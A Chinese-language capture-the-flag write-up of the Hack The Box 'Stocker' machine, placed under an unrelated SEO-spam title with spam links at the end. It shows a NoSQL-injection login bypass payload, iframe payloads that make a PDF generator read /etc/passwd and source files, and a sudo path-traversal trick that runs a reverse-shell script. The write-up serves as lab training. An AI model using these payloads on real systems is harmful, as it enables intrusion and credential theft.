当前位置: 首页 > news >正文

北京企业网站建设pc优化工具

北京企业网站建设,pc优化工具,义乌网络科技有限公司,站酷logo设计靶机地址: https://app.hackthebox.com/machines/Stocker枚举 使用nmap枚举靶机 nmap -sC -sV 10.10.11.196机子开放了22,80端口,我们本地解析一下这个域名 echo "10.10.11.196 stocker.htb" >> /etc/hosts 去浏览器访问…

在这里插入图片描述

靶机地址:

https://app.hackthebox.com/machines/Stocker

枚举

使用nmap枚举靶机

nmap -sC -sV 10.10.11.196

在这里插入图片描述

机子开放了22,80端口,我们本地解析一下这个域名

echo "10.10.11.196 stocker.htb" >> /etc/hosts 

在这里插入图片描述

去浏览器访问这个网站

在这里插入图片描述

发现只是一个单一的网页,并没有其他的功能,插件也很少

现在扫一下目录和子域名,但是目录并没有扫到什么有用的东西

在这里插入图片描述

但是扫描到一个子域名

./gobuster vhost -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 -u stocker.htb

在这里插入图片描述

本地dns解析后去访问这个子域名

echo "10.10.11.196 dev.stocker.htb" >> /etc/hosts

在这里插入图片描述

CVE-2020-24815获取用户shell

这是一个登录页面

在这里插入图片描述

多半是用nodejs写的

在这里插入图片描述

然后我扫描了一下目录,没有什么可以利用的东西

在这里插入图片描述

看了就是要想办法去突破这个登录页面了,网站是nodejs写的,然后我去Google上搜索了一下关于nodejssql注入的内容,然后发现了这篇文章

https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass

在这里插入图片描述

我们可以尝试绕过这个登录页面,启动burp,然后抓登录包

在这里插入图片描述

需要把Content-Type标头改为json数据,然后在下面输入payload

POST /login HTTP/1.1Host: dev.stocker.htbContent-Length: 19Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://dev.stocker.htbContent-Type: application/jsonUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://dev.stocker.htb/loginAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: connect.sid=s%3A0B2QllbQJO8s_zE5apJUSgndnyzmdVi3.USjl%2BHhDYbne%2BUwk2861GQIHQ84D5cK%2FIgJhJl%2Bo5sYConnection: close{"username": {"$ne": null}, "password": {"$ne": null} }

在这里插入图片描述

成功登录,我们这是一个购物网站,现在买一个东西看看有没有突破点

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

提交订单后它会生成一个pdf文件

在这里插入图片描述

到这里我测试了很多东西,这个购物网站的功能很少,页面也很少,sql,rce,什么的都测试了一下,还是不行,我会看burp的http历史的时候发现了一个api请求

在这里插入图片描述

这是我们提交商品的时候请求的信息,之后就会生成一个pdf文件,我尝试修改了一下title标签,发现生成的pdf文件对应的地方也会变

在这里插入图片描述

在这里插入图片描述

这里我想到了很多种漏洞的利用,我把pdf下载下来然后用exiftools工具分析后发现了突破点

在这里插入图片描述

在这里插入图片描述

https://techkranti.com/ssrf-aws-metadata-leakage/
https://www.triskelelabs.com/blog/extracting-your-aws-access-keys-through-a-pdf-file

在这里插入图片描述

它存在ssrf漏洞,可以通过一些特定的方式来读取本地上的文件

现在我们尝试读取一下靶机上的/etc/passwd文件

<iframe src=file:///etc/passwd height=1050px width=800px</iframe>

在这里插入图片描述

在这里插入图片描述

成功利用了,现在我们读取一下nginx的默认配置

<iframe src=file:///etc/nginx/nginx.conf height=1050px width=800px</iframe>

在这里插入图片描述

在这里插入图片描述

这个网站的源代码在/var/www/dev目录下,我们读取一些配置文件看看能不能找到什么有用的东西

<iframe src=file:var/www/dev/index.js height=1050px width=800px</iframe>

在这里插入图片描述
在这里插入图片描述

通过前面读取/etc/passwd,发现这个机子上有两个普通用户,一个是mongodb,一个是angoose,我们读取了配置文件,发现了一个疑似密码的字符串

但是mongodb用户无法用这个密码登录上,angoose可以

在这里插入图片描述

目录遍历提权

在日常查看用户能用sudo命令运行什么工具时,发现了突破点

在这里插入图片描述

我们可以用sudo命令运行node工具,执行在/usr/loacl/scripts目录下的文件,但是我们可以用目录遍历来绕过这个限制

我们在这个网站上生成一个nodejs的rev shellcode

https://www.revshells.com/

在这里插入图片描述

然后在当前目录下创建一个.js文件,将这些代码粘贴进去即可

touch baimao.js

在这里插入图片描述

nc监听端口

在这里插入图片描述

回到靶机执行命令

sudo node /usr/local/scripts/../../../home/angoose/baimao.js

在这里插入图片描述

在这里插入图片描述

http://www.dtcms.com/a/441548.html

相关文章:

  • 网站中的知识 视频从哪里来的手机搜索引擎排行榜
  • 临邑网站开发自己做平台网站
  • 环保局网站如何做备案证明wordpress 浮动广告
  • 营销型网站建设的流程网络营销中的seo与sem
  • 广州购物网站建设报价网络营销公司排名榜
  • 新手如何自己做网站app网站建设有掏钱么
  • 网站建设的目的与意义网站建设费用英文
  • 自己建网站需要多少钱协会建设网站的目的
  • 做金融的网站vs2012网站开发课程设计
  • 河南建设银行处理违章网站企业网站导航设计
  • 公司网站微信平台建设的好处天天seo站长工具
  • 菜鸟教程网站开发西安门户网站建设
  • 做网站帮京东卖东西怎么合作靓号网站开发
  • 做没用的网站怎么查网站做404页面没
  • 网站的意思无法访问WordPress二级
  • 江西求做网站宿迁网站建设流程
  • app手机网站模板免费下载太原营销型网站建设公司
  • 域名只做邮箱没网站要备案吗WordPress文章页版权信息
  • 为什么我的网站做不起来设计平面图
  • 义乌市评建设职称网站建立wordpress用哪个云好
  • svg图片做网站背景小程序前后端开发
  • 建设银行官方网站住在九江网
  • 郴州网站建设维护常德外贸网站优化推广
  • 校园门户网站建设公司装修案例分享的文案
  • 网站建设买阿里云云服务器暴雪加速器
  • 装饰公司做网站怎么收费青白江建设网站
  • 内蒙古建设安全监督站的网站全屏网站代码
  • 南京网站运营公司商业网站设计方案
  • 上海网站建设 销售广州地区网站建设
  • 医院诊所响应式网站模板手机网站成功案例